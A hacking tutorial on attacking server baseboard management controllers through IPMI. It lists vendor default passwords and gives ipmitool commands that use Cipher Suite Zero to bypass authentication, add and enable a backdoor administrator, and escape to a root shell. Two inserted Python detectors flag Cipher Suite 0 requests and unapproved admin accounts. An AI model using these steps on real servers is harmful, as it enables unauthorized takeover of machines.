Baseboard Management Controllers (BMCs) are a type of embedded system present on the motherboard that monitors host system variables such as power, fan speed, temperature, voltage, and humidity. Exploiting these embedded devices is a good way to gain a foothold on a target system.
Enjoy
Exploiting Supermicro and other BMC Embedded Systems

BMCs and Governing Protocol

Baseboard management controllers (BMCs) are a class of embedded computers used to provide monitoring for servers and workstations. They are generally implemented as embedded ARM systems connected to the south bridge of the host system's motherboard. Network access is achieved either via a dedicated interface or sideband onto an existing interface. Almost all workstations and servers come with some sort of support for BMCs, which can also be bought as a PCI expansion card or pluggable module.
IPMI, short for “Intelligent Platform Management Interface,” is the collection of protocols that govern communications across the local system bus as well as the network. IPMI's current default port is 623; however, boxes running IPMI can also be detected if port 49152 is open. And to all those who haven't checked yet, Metasploit has numerous modules to aid in the detection and exploitation of IPMI. Of course you don't need to use these modules to hack this gibson. Exploiting these things manually gives one a better understanding of how all this works. Don't get me wrong, Metasploit is a great tool and definitely has its purposes. However, it can become a hindrance when used as a solution in a learning environment. Below I introduce the first, and admittedly obvious, method of exploiting this service.
Guessing Passwords

Like the common household wireless router, default passwords are not often changed on these boxes. This means one can use the convenient chart below to guess passwords once a target has been identified.

Module           Username  Password
-----------------------------------
Dell Drac/iDrac  root      calvin
IBM IMM          USERID    PASSW0RD
Supermicro IPMI  ADMIN     ADMIN
Fujitsu          admin     admin
Oracle ILOM      root      changeme
Asus iKVM        admin     admin
I purposely left out the HP iLO, since HP was smart enough to realize that lazy sysadmins are most likely going to forget, or just not care enough, to actually change the default password, so they set it to a randomized 8-character string. That mitigates some of the problems, though not Cipher Suite Zero.

Cipher Suite Zero

Of course Metasploit has a module for this, but we are going to go ahead and ignore that because it completely defeats the purpose of learning. With IPMI 2.0 came cryptography, as well as a way to completely bypass authentication. Cipher Suite Zero allows any user on the system to bypass authentication completely. This does require knowledge of a valid user account on the system, which is no problem considering we have a bunch of default accounts to try. To pull off this hack we will use a CLI tool called ipmitool.
To get a feel for the syntax, below is an example ipmitool command that uses Cipher Suite Zero to get a list of users on the system.
# ipmitool -I lanplus -C 0 -H 192.168.207.116 -U ADMIN -P fakepass user list
Let's pick this command apart to see what it is doing:
-I lanplus → this flag specifies that we want to use IPMI version 2.0
-C 0 → this flag specifies that we are using Cipher Suite Zero
-H xx.xx.xx.xx → this flag specifies the target host
-U → self-explanatory, this flag specifies the username
-P → self-explanatory, this flag specifies the password (a fake password in this case)
user list → this is the command that will be executed to list the current users on the host
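What the -C 0 flag puts on the wire is an RMCP+ Open Session Request whose authentication algorithm is RAKP-none, and that request (on UDP port 623) is the signal a defender can watch for. The following is an added example, not code from the original post: it parses that request and raises an alert when Cipher Suite 0 is asked for. The datagrams it checks are constructed inline; the console session ID value is arbitrary.

```python
import struct

# Algorithm identifiers from the IPMI 2.0 RMCP+ Open Session Request payload.
AUTH_ALGS = {0: "RAKP-none", 1: "RAKP-HMAC-SHA1", 2: "RAKP-HMAC-MD5", 3: "RAKP-HMAC-SHA256"}
INTEG_ALGS = {0: "none", 1: "HMAC-SHA1-96", 2: "HMAC-MD5-128", 3: "MD5-128", 4: "HMAC-SHA256-128"}
CONF_ALGS = {0: "none", 1: "AES-CBC-128", 2: "xRC4-128", 3: "xRC4-40"}
PRIVS = {1: "CALLBACK", 2: "USER", 3: "OPERATOR", 4: "ADMINISTRATOR", 5: "OEM"}

def parse_open_session_request(pkt):
    """Return the parameters of an RMCP+ Open Session Request, or None for other datagrams."""
    # RMCP header: version 0x06, reserved, sequence number, message class 0x07 (IPMI).
    if len(pkt) < 48 or pkt[0] != 0x06 or pkt[3] != 0x07:
        return None
    # IPMI 2.0 session header: auth/format 0x06 (RMCP+), payload type 0x10 (Open Session
    # Request), 4-byte session ID, 4-byte sequence number, 2-byte LE payload length.
    if pkt[4] != 0x06 or (pkt[5] & 0x3F) != 0x10:
        return None
    payload_len = struct.unpack_from("<H", pkt, 14)[0]
    payload = pkt[16:16 + payload_len]
    if len(payload) < 32:
        return None
    # Payload: tag, max privilege, 2 reserved, console session ID, then three 8-byte
    # algorithm records (auth, integrity, confidentiality); the algorithm ID is byte 4 of each.
    return {
        "max_priv": PRIVS.get(payload[1] & 0x0F, "?"),
        "console_sid": struct.unpack_from("<I", payload, 4)[0],
        "auth": AUTH_ALGS.get(payload[12] & 0x3F, "?"),
        "integrity": INTEG_ALGS.get(payload[20] & 0x3F, "?"),
        "confidentiality": CONF_ALGS.get(payload[28] & 0x3F, "?"),
    }

def cipher_zero_alert(pkt):
    """Alert string when a client asks for Cipher Suite 0 (RAKP-none), else None."""
    req = parse_open_session_request(pkt)
    if req is None or req["auth"] != "RAKP-none":
        return None
    return "IPMI Cipher Suite 0 requested: priv=%s integrity=%s conf=%s" % (
        req["max_priv"], req["integrity"], req["confidentiality"])

def build_open_session_request(auth_alg, integ_alg, conf_alg, max_priv=4):
    """Constructed test datagram (not captured traffic) in the format parsed above."""
    payload = bytes([0x00, max_priv, 0, 0]) + struct.pack("<I", 0xA4A3A2A0)
    for ptype, alg in ((0x00, auth_alg), (0x01, integ_alg), (0x02, conf_alg)):
        payload += bytes([ptype, 0, 0, 0x08, alg, 0, 0, 0])
    rmcp = bytes([0x06, 0x00, 0xFF, 0x07])
    session = bytes([0x06, 0x10]) + struct.pack("<II", 0, 0) + struct.pack("<H", len(payload))
    return rmcp + session + payload

if __name__ == "__main__":
    print(cipher_zero_alert(build_open_session_request(0, 0, 0)))  # what "-C 0" sends
    print(cipher_zero_alert(build_open_session_request(1, 1, 1)))  # cipher suite 3: None
```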
Now that we have extracted a list of users from the target, let's see if we can add a new user to the system. We will accomplish this with the following commands:
# ipmitool -I lanplus -C 0 -H 192.168.207.116 -U ADMIN -P fakepass user set name 9 voodoo
# ipmitool -I lanplus -C 0 -H 192.168.207.116 -U ADMIN -P fakepass user set password 9 s3cU17y
In the above command lines, we use the “user set name” command to create a user with a UID of 9 and the name voodoo. It is worth mentioning that the UID must be unique per user. I chose 9 arbitrarily as an example, but since there were only two accounts on the system I could have used a UID of 3. We then used the “user set password” command to set the password on our new user, identified by the UID 9.

Can I Haz Admin?

Now that we have added a user, the next logical step is to see if we can give that user any privileges. Fortunately, there is a command for that, which reads:
# ipmitool -I lanplus -C 0 -H 192.168.207.116 -U ADMIN -P fakepass user priv 9 4
# ipmitool -I lanplus -C 0 -H 192.168.207.116 -U ADMIN -P fakepass user enable 9
As you can see, we have leveraged our access to set the privilege level to 4 (i.e., Administrator), and then enabled our account. But hey, this doesn't really do anything; all we have access to is a dumb web UI and a few simple commands. Not quite. Recall that BMCs generally offer a web management UI as well as SSH for management. If we try to SSH into the server using our newly created user account, we find that we now have a shell on the BMC.
[voodoo@spaceghost]# ssh voodoo@192.168.207.116
The authenticity of host '192.168.207.116 (192.168.207.116)' can't be established.
RSA key fingerprint is 21:0e:54:f2:0c:d8:bc:a1:1c:72:e0:3b:e9:ae:f9:82.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.207.116' (RSA) to the list of known hosts.
voodoo@192.168.207.116's password:
ATEN SMASH-CLP System Management Shell, version 1.02
Copyright (c) 2008-2009 by ATEN International CO., Ltd.
All Rights Reserved
->

Digging further

While we have yet to cover all the methods one can use to back-door a BMC module, we will move forward and discuss methods to further exploit a compromised BMC. Let's assume we have already identified a target running IPMI, exploited the BMC using Cipher Suite Zero, and given ourselves a nice little back-door. What now? Where do we go from here? The current SMASH shell appears to be rather restricted and doesn't give us the flexibility we want. There are a few different methods we can use to get a better foothold on the system, the first of which is a hidden function of the BMC firmware.
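The account created and promoted by the commands above is exactly what a periodic audit of the BMC's user table should catch. As an added example (not code from the original post), this parses the output of ipmitool user list and flags Administrator-level accounts that are not on an approved list; the sample output is constructed to match what the steps above would leave behind.

```python
import re

# One row per account, as printed by "ipmitool user list <channel>"; the last column
# (Channel Priv Limit) may contain a space, e.g. "NO ACCESS", so it is matched lazily.
USER_ROW = re.compile(
    r"^\s*(?P<id>\d+)\s+(?P<name>\S*)\s+(?P<callin>true|false)\s+(?P<link>true|false)"
    r"\s+(?P<ipmimsg>true|false)\s+(?P<priv>[A-Z ]+?)\s*$")

def parse_user_list(text):
    """Parse 'ipmitool user list' output into dicts; the header line does not match."""
    users = []
    for line in text.splitlines():
        m = USER_ROW.match(line)
        if m:
            users.append({"id": int(m["id"]), "name": m["name"],
                          "ipmi_msg": m["ipmimsg"] == "true", "priv": m["priv"]})
    return users

def audit_admins(text, approved):
    """Names of ADMINISTRATOR accounts that are not in the approved set."""
    return [u["name"] for u in parse_user_list(text)
            if u["priv"] == "ADMINISTRATOR" and u["name"] not in approved]

# Constructed sample (not real output) of what a BMC lists after "user set" / "user priv".
SAMPLE = """\
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1                    true    false      false      NO ACCESS
2   ADMIN            false   false      true       ADMINISTRATOR
3   monitor          true    false      true       USER
9   voodoo           true    false      true       ADMINISTRATOR
"""

if __name__ == "__main__":
    print(audit_admins(SAMPLE, {"ADMIN"}))  # ['voodoo']
```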
As it turns out, in certain firmware versions, you can call “shell” from the current SMASH shell, which will allow for code execution on the remote machine. An example of this would be appending the command you want to execute on the end of the call to “shell”. For example, “shell pwd” would display the current working directory. Taking this a step further we can leverage this functionality to gain a root shell on the box by simply issuing the following command:
# shell sh
The above command escapes the SMASH shell and drops us into a root shell on the embedded system. If the firmware on the BMC has been updated, escaping into a root shell via the above command will not work. However, we still have God powers on the BMC, so in this scenario we can flash outdated firmware to the BMC and exploit the system through the same escape method. If all this seems just too easy, just wait, because it gets even easier. We can also gain remote code execution through buffer overflow exploits due to poorly written code. I refer to CVE-2013-3621, CVE-2013-3623, and CVE-2013-3622, all of which are known vulnerabilities in the code of CGI applications available through the web interface. CVE-2013-3623 in particular refers to two buffer overflow vulnerabilities in close_window.cgi. Metasploit has an exploit that takes advantage of this CVE, through which we can get a root shell on the system.
References:
https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities
https://community.rapid7.com/community/metasploit/blog/2013/11/15/exploiting-the-supermicro-onboard-ipmi-controller
http://fish2.com/ipmi/cipherzero.html
https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi
Here is a link to my write-up as well:
securityvoodoo.blogspot.com